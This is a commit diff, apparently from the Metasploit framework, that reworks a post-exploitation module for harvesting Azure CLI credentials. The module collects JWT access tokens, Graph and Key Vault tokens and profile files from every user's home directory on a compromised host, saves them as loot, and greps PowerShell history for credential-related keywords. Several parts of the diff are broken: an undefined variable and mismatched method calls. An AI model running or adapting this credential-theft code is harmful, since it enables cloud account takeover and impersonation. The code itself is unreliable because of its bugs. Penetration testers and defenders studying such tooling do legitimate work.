moving azure_cli_files around and stubbing out content

h00die · h00die · commit 7594a4103c2e · 2024-06-06T17:31:19.000-04:00
Update azure lib with process_context_contents

Update azure_spec.rb

Update azure.rb

Update azure_spec.rb

Update azure_cli_creds.rb

fix lint warning

add function to print consolehost_history

print_consolehost_history spec updates

fixing azure_cli spec, and errors
diff --git a/lib/msf/core/post/azure.rb b/lib/msf/core/post/azure.rb
@@ -0,0 +1,100 @@
+# -*- coding: binary -*-
+
+module Msf::Post::Azure
+  def process_tokens_file(file_path, file_data)
+    table_data = []
+    data = parse_json(file_path, file_data)
+    if data
+      dic = {}
+      data.each do |item|
+        if dic.key?(item['userId'])
+          dic[item['userId']] = dic[item['userId']] + 1
+        else
+          dic[item['userId']] = 1
+        end
+      end
+      dic.each do |key, value|
+        table_data << [file_path, key, value]
+      end
+    end
+    table_data
+  end
+
+  #
+  # Processes a hashtable (json) from azureProfile.json
+  #
+  # @param content [Hash] contents of a json file to process
+  # @return [Array]
+  def process_profile_file(content)
+    table_data = []
+
+    # make sure we have keys we expect to
+    return table_data unless content.key? 'subscriptions'
+
+    content['subscriptions'].each do |item|
+      table_data << [item['name'], item.dig('user', 'name'), item['environmentName']]
+    end
+    table_data
+  end
+
+  #
+  # Processes a hashtable (json) generated via Save-AzContext or automatically
+  # generated in AzureRmContext.json
+  #
+  # @param content [Hash] contents of a json file to process
+  # @return [Array]
+  def process_context_contents(content)
+    table_data = []
+
+    # make sure we have keys we expect to
+    return table_data unless content.key? 'Contexts'
+
+    content['Contexts'].each_value do |account|
+      username = account.dig('Account', 'Id')
+      type = account.dig('Account', 'Type')
+      if type == 'ServicePrincipal'
+        account.dig('Account', 'ExtendedProperties', 'ServicePrincipalSecret')
+      end
+      access_token = account.dig('Account', 'ExtendedProperties', 'AccessToken')
+      graph_access_token = account.dig('Account', 'ExtendedProperties', 'GraphAccessToken')
+      # example of parsing these out to get an expiration for the token
+      # unless graph_access_token.nil? || graph_access_token.empty?
+      #   decoded_token = Msf::Exploit::Remote::HTTP::JWT.decode(graph_access_token)
+      #   graph_access_token_exp = Time.at(decoded_token.payload['exp']).to_datetime
+      # end
+      ms_graph_access_token = account.dig('Account', 'ExtendedProperties', 'MicrosoftGraphAccessToken')
+      key_vault_token = account.dig('Account', 'ExtendedProperties', 'KeyVault')
+      table_data.append([username, type, access_token, graph_access_token, ms_graph_access_token, key_vault_token])
+    end
+    table_data
+  end
+
+  #
+  # Print any lines from a ConsoleHost_history.txt file that may have
+  # important information
+  #
+  # @param content [Str] contents of a ConsoleHost_history.txt file
+  # @return Array of strings to print to notify the user about
+  def print_consolehost_history(content)
+    # a list of strings which may contain secrets or other important information
+    commands_of_value = [
+      'System.Management.Automation.PSCredential', # for creating new credentials, may contain username/password
+      'ConvertTo-SecureString', # often used with passwords
+      'Connect-AzAccount', # may contain an access token in line or near it
+      'New-PSSession', # may indicate lateral movement to a new host
+      'commandToExecute', # when used with Set-AzVMExtension and a CustomScriptExtension, may show code execution
+      '-ScriptBlock' # when used with Invoke-Command, may show code execution
+    ]
+
+    output = []
+
+    content.each_line.with_index do |line, index|
+      commands_of_value.each do |command|
+        if line.downcase.include? command.downcase
+          output.append("Line #{index+1} may contain sensitive information. Manual search recommended, keyword hit: #{command}")
+        end
+      end
+    end
+    output
+  end
+end
diff --git a/modules/post/multi/gather/azure_cli_creds.rb b/modules/post/multi/gather/azure_cli_creds.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -9,64 +9,46 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Unix
   include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Azure
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Multi Gather Azure CLI credentials',
-      'Description'   => %q(
-        This module will collect the Azure CLI 2.0 (az cli) settings files
-        for all users on a given target. These configuration files contain
-        JWT tokens used to authenticate users and other subscription information.
-        Once tokens are stolen from one host, they can be used to impersonate
-        the user from a different host.
-      ),
-      'License'       => MSF_LICENSE,
-      'Author'        => ['James Otten <jamesotten1[at]gmail.com>'],
-      'Platform'      => ['win', 'linux', 'osx'],
-      'SessionTypes'  => ['meterpreter']
-    ))
-  end
-
-  def process_profile_file(file_path, file_data)
-    table_data = []
-    data = parse_json(file_path, file_data)
-    if data && data.key?("subscriptions")
-      data["subscriptions"].each do |item|
-        table_data << [file_path, item["name"], item["user"]["name"], item["environmentName"]]
-      end
-    end
-    table_data
-  end
-
-  def process_tokens_file(file_path, file_data)
-    table_data = []
-    data = parse_json(file_path, file_data)
-    if data
-      dic = {}
-      data.each do |item|
-        if dic.key?(item["userId"])
-          dic[item["userId"]] = dic[item["userId"]] + 1
-        else
-          dic[item["userId"]] = 1
-        end
-      end
-      dic.each do |key, value|
-        table_data << [file_path, key, value]
-      end
-    end
-    table_data
+    super(
+      update_info(
+        info,
+        'Name' => 'Multi Gather Azure CLI Credentials',
+        'Description' => %q{
+          This module will collect the Azure CLI 2.0 (az cli) settings files
+          for all users on a given target. These configuration files contain
+          JWT tokens used to authenticate users and other subscription information.
+          Once tokens are stolen from one host, they can be used to impersonate
+          the user from a different host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'James Otten <jamesotten1[at]gmail.com>', # original author
+          'h00die' # additions
+        ],
+        'Platform' => ['win', 'linux', 'osx'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
   end
 
-  def parse_json(file_path, str)
-    data = nil
-    options = { :invalid => :replace, :undef => :replace, :replace => '' }
-    str = str.encode(Encoding.find('ASCII'), options)
+  def parse_json(data)
+    json_blob = nil
+    options = { invalid: :replace, undef: :replace, replace: '' }
+    str.encode(Encoding.find('ASCII'), options)
     begin
-      data = JSON.parse(str)
+      json_blob = JSON.parse(data)
     rescue ::JSON::ParserError
-      print_error("Unable to parse #{file_path}")
+      print_error('Unable to parse json blob')
     end
-    data
+    json_blob
   end
 
   def user_dirs
@@ -78,54 +60,96 @@ def user_dirs
     elsif session.platform == 'linux' || session.platform == 'osx'
       user_dirs = enum_user_directories
     else
-      fail_with(Failure::BadConfig, "Unsupported platform")
+      fail_with(Failure::BadConfig, 'Unsupported platform')
     end
     user_dirs
   end
 
   def run
     subscription_table = Rex::Text::Table.new(
-      "Header" => "Subscriptions",
-      "Columns" => ["Source", "Account Name", "Username", "Cloud Name"]
+      'Header' => 'Subscriptions',
+      'Indent' => 1,
+      'Columns' => ['Source', 'Account Name', 'Username', 'Cloud Name']
     )
     tokens_table = Rex::Text::Table.new(
-      "Header" => "Tokens",
-      "Columns" => ["Source", "Username", "Count"]
+      'Header' => 'Tokens',
+      'Indent' => 1,
+      'Columns' => ['Source', 'Username', 'Count']
     )
-    loot_type = nil
-    description = nil
+    context_table = Rex::Text::Table.new(
+      'Header' => 'Context',
+      'Indent' => 1,
+      'Columns' => ['Username', 'Account Type', 'Access Token', 'Graph Access Token', 'MS Graph Access Token', 'Key Vault Token']
+    )
+
     user_dirs.map do |user_directory|
       vprint_status("Looking for az cli data in #{user_directory}")
-      %w[.azure/accessTokens.json .azure/azureProfile.json .azure/config].each do |file_location|
+      # leaving all these as lists for consistency and future expansion
+
+      # ini file content, not json.
+      vprint_status('  Checking for config files')
+      %w[.azure/config].each do |file_location|
         possible_location = ::File.join(user_directory, file_location)
-        if exists?(possible_location)
-          data = read_file(possible_location)
-          if data
-            vprint_status("Found az cli file #{possible_location}")
-            if file_location.end_with?("accessTokens.json")
-              loot_type = "azurecli.jwt_tokens"
-              description = "Azure CLI access/refresh JWT tokens"
-              process_tokens_file(possible_location, data).each do |item|
-                tokens_table << item
-              end
-            elsif file_location.end_with?("config")
-              loot_type = "azurecli.config"
-              description = "Azure CLI configuration"
-            elsif file_location.end_with?("azureProfile.json")
-              loot_type = "azurecli.azure_profile"
-              description = "Azure CLI profile"
-              process_profile_file(possible_location, data).each do |item|
-                subscription_table << item
-              end
-            end
-            stored = store_loot(loot_type, "text/plain", session, data, file_location, description)
-            print_good("#{possible_location} stored to #{stored}")
+        next unless exists?(possible_location)
+        next unless readable?(possible_location)
+
+        data = read_file(possible_location)
+        next unless data
+
+        # https://stackoverflow.com/a/16088751/22814155 no ini ctype
+        loot = store_loot 'azure.config.ini', 'text/plain', session, data, file_location, 'Azure CLI Config'
+        print_good "    #{file_location} stored in #{loot}"
+      end
+
+      vprint_status('  Checking for context files')
+      %w[.azure/AzureRmContext.json].each do |file_location|
+        possible_location = ::File.join(user_directory, file_location)
+        next unless exists?(possible_location)
+        next unless readable?(possible_location)
+
+        data = read_file(possible_location)
+        next unless data
+
+        loot = store_loot 'azure.context.json', 'text/json', session, data, file_location, 'Azure CLI Context'
+        print_good "    #{file_location} stored in #{loot}"
+        data = parse_json(data)
+        results = process_context_contents(data)
+        results.each do |result|
+          context_table << result
+        end
+      end
+
+      %w[.azure/accessTokens.json .azure/azureProfile.json].each do |file_location|
+        possible_location = ::File.join(user_directory, file_location)
+        next unless exists?(possible_location)
+
+        data = read_file(possible_location)
+        next unless data
+
+        vprint_status("Found az cli file #{possible_location}")
+        if file_location.end_with?('accessTokens.json')
+          loot_type = 'azurecli.jwt_tokens'
+          description = 'Azure CLI access/refresh JWT tokens'
+          process_tokens_file(possible_location, data).each do |item|
+            tokens_table << item
+          end
+        elsif file_location.end_with?('config')
+          loot_type = 'azurecli.config'
+          description = 'Azure CLI configuration'
+        elsif file_location.end_with?('azureProfile.json')
+          loot_type = 'azurecli.azure_profile'
+          description = 'Azure CLI profile'
+          process_profile_file(possible_location, data).each do |item|
+            subscription_table << item
           end
         end
+        stored = store_loot(loot_type, 'text/plain', session, data, file_location, description)
+        print_good("#{possible_location} stored to #{stored}")
       end
     end
 
-    print_line(subscription_table.to_s)
-    print_line(tokens_table.to_s)
+    print_good(subscription_table.to_s) unless subscription_table.rows.empty?
+    print_good(tokens_table.to_s) unless tokens_table.rows.empty?
+    print_good(context_table.to_s) unless context_table.rows.empty?
   end
 end
diff --git a/spec/lib/msf/core/post/azure_spec.rb b/spec/lib/msf/core/post/azure_spec.rb
